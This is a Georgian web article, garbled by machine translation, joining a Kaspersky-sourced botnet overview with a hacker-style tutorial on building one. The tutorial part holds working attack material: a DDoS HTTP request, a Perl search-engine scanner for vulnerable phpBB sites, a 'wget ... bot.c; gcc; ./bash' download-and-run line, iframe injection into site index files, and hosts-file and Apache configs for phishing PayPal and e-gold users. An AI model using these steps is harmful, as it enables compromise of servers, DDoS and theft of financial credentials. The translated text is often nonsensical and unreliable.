თუ თქვენს LiveJournal-ზე გამოქვეყნებამდე ან ფოტო ჰოსტინგზე გამოქვეყნებულ სხვა ფოტოებს კომენტარებში წერთ ანონიმურ შეტყობინებებს, რომლებიც შექმნილია თქვენთვის უცნობი ადამიანების და ზოგჯერ თქვენი „მეგობრის“ მიერ, ნუ გაგიკვირდებათ: უბრალოდ ცდილობთ თქვენი რესურსის პოპულარიზაციას. ბოტის ოსტატები არა. სპეციალურად შექმნილ პროგრამას მიიზიდავს ზომბი კომპიუტერი და მისი ლიდერის სახელით ართმევს პოპულარულ რესურსებს კომენტარებისგან საიტის გაშვების მოთხოვნით. არალეგალური საძიებო სპამის სერვისების საშუალო ფასი თვეში დაახლოებით 300 დოლარია.

რამდენი პირადი დეტალია საჭირო?

მოპარული პერსონალური მონაცემების საფრთხე იმ ქვეყანაში უნდა იყოს, სადაც მათი კანონიერი მმართველი ცოცხალია. მაგალითად, აშშ-ს რეზიდენტისთვის საშუალო ფასი 5-8 დოლარია. შავ ბაზარზე განსაკუთრებით ღირებულია ევროკავშირის მაცხოვრებლების ხარკი - ისინი ორჯერ-სამჯერ უფრო ძვირია, ვიდრე აშშ-სა და კანადის მოქალაქეების ხარკი. შეიძლება აიხსნას, რომ ასეთი მონაცემებით ბოროტ ადამიანებს შეუძლიათ მეძავები გახდნენ ევროკავშირის ნებისმიერ ქვეყანაში. საშუალოდ მსოფლიოში, ერთი ადამიანის შესახებ მონაცემთა სრული პაკეტის ფასი 7 დოლარს უახლოვდება.

სამწუხაროდ, მათთვის, ვისაც სურს ბოტნეტის ორგანიზება "ნულიდან", განსაკუთრებით რთული არ არის ინტერნეტში ინსტრუქციების პოვნა ზომბების შესაქმნელად. პირველი კროკი: შექმენით ახალი ზომბის სიკვდილი. ამ მიზნით აუცილებელია თანამშრომლების კომპიუტერების დაინფიცირება სპეციალური პროგრამით - ბოტით. ინფექციისთვის გამოიყენება სპამის მიმწოდებლები, ფორუმებზე და სოციალურ ქსელებში შეტყობინებების განთავსება და სხვა მეთოდები; ხშირად ბოტი აღჭურვილია თვითგავრცელების ფუნქციით, როგორიცაა ვირუსები ან ჭიები.

პოტენციური მსხვერპლის შევიწროების მიზნით, დააინსტალირეთ ბოტი სოციალური ინჟინერიის ტექნიკის გამოყენებით. მაგალითად, თუ გსურთ ბევრი ვიდეოს ყურება, დაგჭირდებათ სპეციალური კოდეკის გამოყენება. თუ გადაწყვეტთ ასეთი ფაილის გაშვებას, აშკარად ვერ ნახავთ ვიდეოს და ვერც ცვლილებების მონიშვნას შეძლებთ და თქვენი კომპიუტერი დაინფიცირდება და გახდებით თავმდაბალი მსახური, რომელიც ემორჩილება ყველა ბრძანებას. სამაგისტრო ბოტნეტი.

ბოტების მიერ ინფექციის კიდევ ერთი ფართოდ გამოყენებული მეთოდი არის დრაივით ჩაკეტვა. როდესაც თქვენ შედიხართ თქვენს კომპიუტერში ინფიცირებულ ვებსაიტზე დანამატების სხვადასხვა „ხვრელების“ მეშვეობით - უპირველეს ყოვლისა პოპულარულ ბრაუზერებში - კორუმპირებული კოდი ვლინდება. სუსტი წერტილების გამოსაყენებლად, თქვენ უნდა გამოიყენოთ სპეციალური პროგრამები - ექსპლოიტი. ისინი გაძლევენ არა მხოლოდ გატაცების, არამედ ვირუსის ან ბოტის გაშვების საშუალებას. იაფი პროგრამული უზრუნველყოფის ამ ტიპის გაფართოება ყველაზე საშიშია და მავნე პოპულარული რესურსის გამოყენების შემთხვევაშიც კი ათიათასობით მომხმარებელი დაინფიცირდება!

ბოტი შეიძლება აღჭურვილი იყოს კომპიუტერულ ქსელებში თვითგანაწილების ფუნქციით. მაგალითად, თქვენ შეიძლება დაინფიცირდეთ ყველა ხელმისაწვდომი კომპილირებული ფაილის ინფიცირებით, ან თქვენი კომპიუტერების მოძებნისა და დაინფიცირების შესაძლებლობით.

ინფიცირებულ კომპიუტერებს არაფერში ეჭვი არ ეპარებათ. ბოტნეტის შემქმნელებს შეუძლიათ გააკონტროლონ ბოტნეტის ბრძანების ცენტრი ბოტებთან კომუნიკაციით IRC არხის, ვებ-კავშირის ან ნებისმიერი სხვა ხელმისაწვდომი საშუალებით. სულ მცირე ათეული მანქანა უნდა იყოს გაერთიანებული, რათა ბოტმა დაიწყოს თავისი მთავრობის შემოსავლის შემოტანა. უფრო მეტიც, ეს შემოსავალი ხაზოვან მდგომარეობაშია, რაც დამოკიდებულია ზომბების საზღვრის სტაბილურობაზე და მისი ზრდის ტემპზე.

სარეკლამო კომპანიები, რომლებიც მოქმედებენ ონლაინ რეჟიმში PPC (Pay-per-Click) სქემის მიხედვით, იხდიან გროშებს ინტერნეტ რეკლამებზე განთავსებულ რეკლამებზე უნიკალური დაწკაპუნებებისთვის. ვლასნიკებისთვის ბოტნეტი არის ასეთი კომპანიების და მოგების მომტანი საქმიანობის მოტყუება. ამ მაგალითისთვის შეგიძლიათ გამოიყენოთ Google AdSense. მასში, რეკლამის განმთავსებლები უხდიან Google-ს სარეკლამო რეკლამებზე დაწკაპუნებებისთვის იმ იმედით, რომ „გზაზე“ ყურების შემდეგ მყიდველები მათგან იყიდიან რამეს.

Google, თავის მხრივ, განათავსებს კონტექსტურ რეკლამას სხვადასხვა საიტებზე, რომლებიც მონაწილეობენ AdSense პროგრამაში და უხდიან საიტს ასობით დოლარს თითო დაწკაპუნებით. სამწუხაროდ, ვებსაიტის ყველა ავტორიტეტი არ არის გულწრფელი. ზომბების საფრთხის გამო, ჰაკერს შეუძლია შექმნას ათასობით უნიკალური დაწკაპუნება დღეში - თითო თითოეულ მანქანაზე, Google-ის მხრიდან რაიმე განსაკუთრებული ეჭვის გარეშე. ამგვარად, სარეკლამო კომპანიაზე დახარჯული გროშები ჰაკერის ნაწლავებში ჩაედინება. სამწუხაროა, რომ სხვა მსგავსი მოვლენა არ ყოფილა, როცა ვინმეს ასეთი ქმედებების აღიარების დონე მიიზიდა. კომპანია Click Forensics-ის მონაცემებით, 2008 წელს, სარეკლამო შეტყობინებებზე დაწკაპუნების დაახლოებით 16-17% იყო ფრაგმენტირებული, აქედან მინიმუმ მესამედი ბოტნეტების მიერ იყო გენერირებული. არასასიამოვნო გამოთვლების ნახვის შემდეგ, შეიძლება გავიგოთ, რომ გასულ წელს ბოტნეტის მმართველებმა 33 000 000 დოლარი "შეიგროვეს". ცუდი შემოსავალი მაუსის დაწკაპუნებით!

კრიმინალებისთვის და არაკეთილსინდისიერი ბიზნესმენებისთვის სულაც არ არის ადვილი საკუთარი ძალის გამოყენებით ბოტნეტის შექმნა „ნულიდან“. სხვადასხვა ზომისა და პროდუქტიულობის ბოტნეტების შეძენა ან დაქირავება შესაძლებელია ჰაკერებისგან - მაგალითად, სპეციალიზებულ ფორუმებზე გამოქვეყნებით.

მზა ბოტნეტის სიმძლავრე, ისევე როგორც მისი შეკვეთის სიმძლავრე, რა თქმა უნდა, იქნება ახალ კომპიუტერში შესული კომპიუტერების რაოდენობას შორის. ბოტნეტები მზად არიან მოიპოვონ უდიდესი პოპულარობა ინგლისურ ფორუმებზე.

მცირე ბოტნეტები, რომლებიც რამდენიმე ასეული ბოტისგან შედგება, 200-დან 700 დოლარამდე ღირს. ამის გათვალისწინებით, ერთი ბოტის საშუალო ფასი დაახლოებით 50 ცენტია. მეტი ბოტნეტი დიდ პენი ღირს.

Shadow zombie-ს, რომელიც 19 წლის ჰოლანდიელმა ჰაკერმა შექმნა, 100 ათასზე მეტი კომპიუტერი გაავრცელა მთელ მსოფლიოში და გაიყიდა 25000 ევროდ. ამ პატარა ფულით შეგიძლიათ შეიძინოთ პატარა ბუდინოჩკა ესპანეთში, ან ბრაზილიაში უკეთეს ფასად.

დაცვა ბოტნეტებისგან

1. უპირველეს ყოვლისა, არსებობს ანტივირუსული პროგრამები და ყოვლისმომცველი პაკეტები ინტერნეტის საფრთხეებისგან დაცვის მიზნით რეგულარულად განახლებული მონაცემთა ბაზებით. ისინი ხელს შეუწყობენ არა მხოლოდ პრობლემების დაუყოვნებლივ გამოვლენას, არამედ მათ აღმოფხვრას, სანამ თქვენი ტრანსფორმაცია ზომბებზე, თქვენი ერთგული „სლაიმ მეგობარი“, დაიწყებს სპამის ან „გამოტოვების“ საიტების გაფანტვას. კომპლექსური პაკეტები, მაგალითად, Kaspersky Internet Security 2009, შეიცავს მძლავრი ფუნქციების ახალ კომპლექტს, რომელთა კონტროლი შესაძლებელია ცენტრალური ბრძანების ცენტრის მეშვეობით.

ანტივირუსული მოდული მუშაობს ფონზე და სკანირებს სისტემის კრიტიკულ უბნებს და აკონტროლებს ვირუსის შეჭრის ყველა შესაძლო მარშრუტს: ელფოსტის დანართებს და პოტენციურად დაუცველ ვებსაიტებს.

Firewall იცავს მონაცემთა გაცვლას პერსონალურ კომპიუტერსა და ინტერნეტს შორის. ის ამოწმებს მონაცემთა ყველა პაკეტს, რომელიც არის მოძიებული ან გაგზავნილი იქიდან და, საჭიროების შემთხვევაში, ბლოკავს ქსელის შეტევებს და ხელს უშლის სპეციალური მონაცემების ინტერნეტში გაგზავნას.

სპამის ფილტრი იცავს ფოსტის ეკრანს სარეკლამო შეტყობინებების შეღწევისგან. ეს განყოფილება ასევე მოიცავს ფიშინგ სიების გამოვლენას, რათა დაეხმაროს კრიმინალებს კლიენტისგან ინფორმაციის მოპოვებაში მათი მონაცემების შესახებ ონლაინ გადახდის ან საბანკო სისტემებში შესვლისთვის.

2. ოპერაციული სისტემის, ვებ ბრაუზერების და სხვა დანამატების რეგულარული განახლებები, რომლებიც ავლენს და აღმოფხვრის მათ დაცვაში არსებულ უამრავ ხარვეზს, ასევე სუსტ წერტილებს, რომლებსაც კრიმინალები იყენებენ.

3. სპეციალური დაშიფვრის პროგრამებს შეუძლიათ მოიპარონ თქვენი პერსონალური მონაცემები, რაც მიუთითებს იმაზე, რომ ბოტი უკვე შეაღწია თქვენს კომპიუტერში და თქვენ მოგიწევთ პაროლის შეცვლა მასზე წვდომისთვის.

4. ჯანმრთელი გონება და სიფრთხილე. თუ გსურთ დაიცვათ თქვენი მონაცემები სხვადასხვა სახის საფრთხისგან, ნუ გაიტაცებთ და არ დააინსტალიროთ უცნობი ხასიათის პროგრამები, გახსენით არქივები ფაილებით ანტივირუსის წინ, გადადით საიტებზე, რომლებსაც თქვენი ბრაუზერი მიუთითებს, როგორც სახიფათო და ა.შ.

მადლობა კასპერსკის ლაბორატორიას მასალის მომზადებაში დახმარებისთვის

სისტემები თანდათან იხვეწება, პროგრამები უფრო საიმედო ხდება. ახლა უფრო და უფრო ნაკლები ფართოდ ცნობილი შესწორებებია დაშვებული.

[Პროლოგი]
ინტერნეტი დიდი ძალით იზრდება. ჰაკერისთვის უფრო და უფრო მნიშვნელოვანი ხდება ხუმრობა და აგრესიულობა. ადმინები გამარჯვებულები არიან უსაფრთხოების მაგარი ექსპერტების დასაცავად. იცი შენი აზრები? სინამდვილეში, ინტერნეტში ბევრი კონფლიქტია, მაგრამ ისინი ნაკლებად გამოსადეგია. კარგი, როგორც კი აქსისი გაოცდება, თავად გააცნობიერე სიტუაცია, შენ გყავს რაღაც ჰეჯის ნაძირალა და გინდა მისი დასჯა. დღეს ჩვენ ვისაუბრებთ ძლიერი საბრძოლო ბოტნეტის შექმნაზე.
რა არის "ბოტი"? გაუთვითცნობიერებელი ადამიანი მაშინვე იხსენებს კომპიუტერულ თამაშებში სულელ მოწინააღმდეგეებს, რომლებსაც ორ წუთში ისვრით. დიახ, ხშირად ასეა. "ბოტის" ჩვენს ვერსიას აქვს პროგრამა, რომელსაც აქვს ჩაშენებული ბრძანებები. არაფერი განსაკუთრებული, როგორც ჩანს. მინდა დავბლოკო: ”მე, ეს რომ ვთქვი, დავწერე ხუთ დღეში, დააჭირეთ ღილაკს და პროგრამა, ოლია-ლა, იხურება.” დავივიწყოთ ბავშვობა. ჩვენ ყველამ ვიცით, რომ კოდირების შესაძლებლობები გაუთავებელია და მისი გამოყენება შესაძლებელია სიკეთისთვის და ბოროტებისთვის. ჩვენ, რა თქმა უნდა, ყოველთვის გამარჯვებული ვიქნებით ჩვენს განვითარებაში კეთილი განზრახვებით. „ბოტნეტი“ არის ერთ ცენტრში თავმოყრილი ანონიმური ბოტების კოლექცია, რომლებიც ერთდროულად ასრულებენ მმართველის ბრძანებებს. ბოტები, საუბრის წინ, ძირითადად გამიზნულია ვინდოუსის აპარატებზე. აქ შეგიძლიათ შეიძინოთ პაროლები, დააყენოთ პაროლი და დაფორმატოთ gwent. მე გავივლი წესებს და აგიხსნით როგორ შევქმნა ბოტნეტი ნებისმიერი რაოდენობის მანქანიდან. ჩვენი ბოტის მთავარი ფუნქციაა DDOS შეტევების ორგანიზება. ეს არის იდეალური გზა nix სერვერების ფართო არხების გამოსაყენებლად. Გაუმარჯოს. სერვერი, რომელიც უნდა იყოს "ჩამოტვირთვა", ღირს 100 მბ არხი. ასე რომ, ერთ არხზე მდგარი 10-20 ბოტი მთლიანად გადატვირთავს სერვერს. იმის გამო, რომ ერთი სერვერი შეიძლება იყოს დაცული firewall-ით, მაშინ არის ბოტების დიდი რაოდენობა, სამწუხაროდ, შეკვეთა არ არის

[დაწერილია ბოტის მიერ]
თქვენ შეგიძლიათ იპოვოთ ბოტის ჩამონათვალი სტატიის ბოლოს მოცემულ ბმულზე გადასვლით. კოდს ცოტას გავარკვევ. (ჰეი, Dream ისევ აკონტროლებს ყველაფერს IRC-ის საშუალებით? უფრო მაგარია WEB-ით!). გამოსვლამდე აკონტროლეთ საუბრები IRC-ით თქვენი ინტერაქტიულობით. ვთქვათ, მსურს გამოვიყენო ადგილობრივი ბირთვული ექსპლოიტები რამდენიმე სერვერის ბოტნეტად გადაქცევისთვის. მე უბრალოდ შევიყვან ბრძანებას SH uname -a ბოტის საშუალებების გამოყენებით და მყისიერად ვიპოვი საჭირო კომპიუტერს. შემდეგ ასევე შევდივარ ბრძანებას კლიენტის IRC-ში, შევდივარ უკანა კარში და ვხსნი ინტერაქტიულ გარსს შემდგომი მოქმედებებისთვის. შესაძლებლობები უსაზღვროა. იტყვით, რომ ასეთი კონტროლი შეიძლება განხორციელდეს WEB-ის საშუალებით, მაგრამ რაც შეეხება გვერდის ხელახლა ჩართვას და ტრაფიკის დაკარგვას? ბევრად უფრო რთულია ყველაფრის რეალურ დროში მონიტორინგი (თუმცა, თუ 1000-ზე მეტი ბოტია, შეგიძლიათ იკითხოთ, მაგალითად, ინტერფეისის ხელით მუშაობის შესახებ). ვინ ფიქრობს, რომ DDOS ორგანიზაცია მარჯვნივ არის ძალიან რთული. ღერძის კონდახის კოდი საწყისი შეტევისთვის:

მიიღეთ /server.org HTTP/1.0\r\nკავშირი: Keep-Alive\r\nმომხმარებლის აგენტი: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nმასპინძელი: server.org:80\r\nმიღება: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-charset: iso- 8859-1, *, utf-8\r\n\r\n

შემდეგ, ჩვენ უბრალოდ ვთხოვთ სერვერს, მოითხოვოს ახალი ინფორმაცია. უფრო მეტიც, ჩვენ ვითხოვთ, რომ სერვერს არ განიცდიდეს ტრაფიკის ან პროცესორის დროის ნაკლებობა. თუ თქვენ შემოიფარგლებით მხოლოდ ექვსი ბოტით, მოგიწევთ Windows-ის ბოტნეტის შექმნა, მაგალითად, AgoBot-ის საფუძველზე. ამ მიზნით, შეგიძლიათ შექმნათ კოდი ბოტისთვის, რომელიც შეგიძლიათ დაასკანიროთ lsasl / dcom აპარატის კავშირებისთვის, როგორიცაა დაკავშირება სერვერთან, რომელზეც დაინსტალირებულია ბოტი.

[ბოტნეტის შექმნა]
ბოტნეტის შექმნა მართლაც მარტივია. რატომ უნდა ვიცოდეთ ნაკადი ნებისმიერ ვებ სკრიპტში. დაფიქსირდა პრობლემა ჭურვის ბრძანებების წაშლის დაშვებისას. თუ პრობლემას აღმოაჩენთ, შეამოწმეთ ფაილის სახელი, მისი სათაური და სისტემის სახელი. ახლა, ამ მონაცემების დასახმარებლად, თქვენ უნდა მოაწყოთ კარგი ხუმრობითი წინადადება. მაგალითად, აშკარაა, რომ phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ Sock = IO :: Socket :: INET-> new (PeerAddr => "search.aol.com", PeerPort => "80", P ro to => "tcp") ან შემდეგი; ბეჭდვა $ sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu =<$sock>; დახურვა ($ sock);

Wget http://server.org/bot.c;gcc bot.c -o bash; ჩმოდ + x ბაშ; ./ბაშ;

აქ ორი პრობლემა შეიძლება წარმოიშვას. wget და gcc შეიძლება არ გამოჩნდეს ან მათი ვიკი დაიბლოკება. აქ ჩამომტვირთველები fech, curl and get ან Lynx კონსოლის ბრაუზერი დაგვეხმარება, ან შეგვიძლია გამოვიყენოთ ftp პროტოკოლი. მისი დანერგვა უფრო რთულია და პლიუსი ის არის, რომ ftp ყველგან არის. თუ კომპილერის პრობლემაა, შეგიძლიათ უბრალოდ შეადგინოთ ბინარი თქვენს ყუთში და ჩათვალოთ, რომ ყველაფერი კარგად იქნება, ან გადაწეროთ ბოტი ინტერნეტის ენის განვითარებაში - Perl ან PHP. კანის მეთოდს აქვს თავისი დადებითი და უარყოფითი მხარეები, რომელი არ უნდა აირჩიოთ. მაქსიმუმ ვიკორისტოვატი ჰოოპს სერვერს ვურეკავ. nix სერვერზე არსებული ბოტიც კი შეიძლება გაიწმინდოს მხოლოდ მანამ, სანამ მანქანა პირველად არ გადაიტვირთება. ამ სიტუაციიდან ერთი ნათელი გამოსავალი არსებობს. ბოტი მოძებნის ინტერპრეტაციად ფაილებს (.pl, .php), რომლებიც დასაწერია და დაამატებს ჩამოტვირთვის კოდს და გაუშვებს ბოტს. ან შეგიძლიათ შექმნათ Windows ბოტნეტი. ის ისეთივე მარტივია განსახორციელებელი. აქ თქვენ უნდა გახსნათ ინტერნეტ ბრაუზერი (Internet Explorer, Opera, Mozilla), რომ ჩამოტვირთოთ და გაუშვათ საჭირო ფაილი. შემდეგი, იქმნება ინფრაიმის ჩანაწერი და გამოიყენება ჩვენი უფასო კოდი. ეს ჩანაწერი ემატება ყველა ინდექსის ფაილს (ან ყველა შეიცავს html კოდს, ყველაფერი თქვენი თავხედობის გამო). ამგვარი სამუშაოს ეფექტურად შესრულება შესაძლებელია პატარა Haz სკრიპტით, რომელიც ასევე შეგიძლიათ იპოვოთ არქივში. ბარგი ივსება ჩანაწერებით Internet Explorer-ში კრიტიკული დაღვრის შესახებ, ასე რომ, ჩვენი შეკვეთით იქნება ბოტნეტი Windows-ის სისტემებზე (ეს პლიუსია, მე გამოვიცანი). ესე იგი, გაუშვით ჩვენი ჭიაყელა შვედურ ყუთზე, დალიეთ ცოტაოდენი კავი (ლუდი, საწვავი, პომიდვრის წვენი), გადადით IRC არხზე ბოტის ავტორიტეტების ინსტრუქციებისთვის და უფრთხილდით თქვენი ქვეშევრდომების რაოდენობას. და ბოლოს, მინდა მივესალმო ყველას, ვისაც ვიცნობ და წარმატებები გისურვოთ. არ დაიჭიროთ.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX

phpBB-ში დაუცველობა აქტუალურია 2.0.16 ვერსიამდე, თუმცა დეველოპერები ადასტურებენ, რომ ისინი გამოსწორებულია 2.0.11-ში.

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

ფიშინგი
ძალიან ადვილია ბოტების დამიზნება, როგორც ფიშინგის ორგანიზაციის ნაწილი. ფიშინგის ამ განსაკუთრებული საჭიროებისთვის, ჩვენ გვჭირდება ადაპტირებული ვებსაიტი და კარგი ჰოსტინგი, ვიდეო სერვერი ან VDS. თქვენ შეგიძლიათ თავად შექმნათ ასეთი ისტორიები, შეიძინოთ ისინი ან იპოვოთ ისინი ინტერნეტში. განწყობა შესანიშნავია. ყველაზე ხშირად ფიშინგი ორგანიზებულია საიტებზე: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om და სხვა, ისევე როგორც სხვა, რომლებიც დაკავშირებულია ელექტრონულ კომერციასთან. შემდეგი, Windows ბოტი გადაწერს ფაილს \system32\drivers\etc\hosts თქვენი სერვერის ახალ IP მისამართზე და მიაკუთვნებს მას თქვენთვის საჭირო საიტის ახალ ალიასს. ფაილის ფორმატი არის:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

შემდეგ, ბრაუზერში ჩაწერეთ საიტები e-gold.com და paypal.com, სავაჭრო ობიექტს არაფერი უგზავნის ჩვენს სერვერზე ეჭვის გარეშე. თქვენს სერვერზე Fisher სერვერზე, httpd.conf შეიცავს ჩანაწერებს ქვედომენების შესახებ.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias ​​"e-gold.com" "www.e-gold.com"

თქვენს ბრაუზერში თქვენ გაეცნობით მისამართს e-gold.com და გაუგზავნით თქვენს ანგარიშს საიტზე ეჭვის გარეშე. სურათის დასასრულებლად მე ვიტყვი, რომ თუ კლიენტი იყენებს პროქსი სერვერს, ეს მეთოდი არ იქნება გამოყენებული

ბოტი ნებისმიერი ხალისით
Agobot / Phatbot / Forbot / XtremBot
ეს არის სპამის საძიებო რობოტების ყველაზე ლამაზი ოჯახი. დაწერილია C++-ში. არ არსებობს დაცვის ფუნქციები, როგორც იდენტიფიცირებული და არის 500-ზე მეტი მოდიფიკაცია მკაფიოდ განსაზღვრული მოდულური სტრუქტურით.
SDBot/RBot/UrBot/UrXBot
DDOS შეტევების განსახორციელებელი ბოტები ამ დღეებში კიდევ უფრო პოპულარულია. დამატებითი ფუნქცია არ არის. როგორიცაა Sock4, keylogger, ავტომატური lsass სკანერი და dcom spills. მას ასევე აქვს ანტივირუსული კომპანიების ვებსაიტებზე მოთხოვნების გადამისამართების ფუნქცია ლოკალურ სერვერზე \system32\drivers\etc\host-ების რედაქტირებით და 80-ე პორტზე მცირე ფრაგმენტირებული ვებ სერვერის დაყენებით.
DSNX ბოტები
ამ ბოტს შეუძლია განახორციელოს DDOS შეტევები, პორტების სკანირება და სხვა აქტივობები.
Q8 ბოტები
ადმინისტრაციული ბოტი nix სისტემის ქვეშ. იგი გამოირჩევა კომპაქტური კოდით (27 კბ, შედგება ერთი ფაილისგან) და ცუდი ფუნქციონირებით. არსებობს ახალი ფაილის ჩამოტვირთვისა და გაშვების დინამიური გზა. ის კარგად ახორციელებს DDOS-ის ძირითად განხორციელებას (SYN-flood, UDP-flood). თქვენ შეგიძლიათ გააუქმოთ სისტემის ბრძანებები. ასევე ცუდია სისტემაში შენიღბვა.
კაიტენი
ასევე საზიზღარი ბოტი Unix/Linux სისტემებისთვის. თქვენ შეგიძლიათ გახსნათ დისტანციური ჭურვები შენახულ სერვერებზე.
Perl-ზე დაფუძნებული ბოტები
ეს ძალიან ცოტა რამ პერლშია დაწერილი. Vikorist DDOS შეტევებისთვის Unix-ზე დაფუძნებულ სისტემებზე.

---
ამ სტატიას შეიძლება ჰაკერების დიდი დარტყმა ჰქონდეს, ასე რომ, თუ არ გესმით, მიირთვით.

© 2021 მობილური და კომპიუტერული გაჯეტები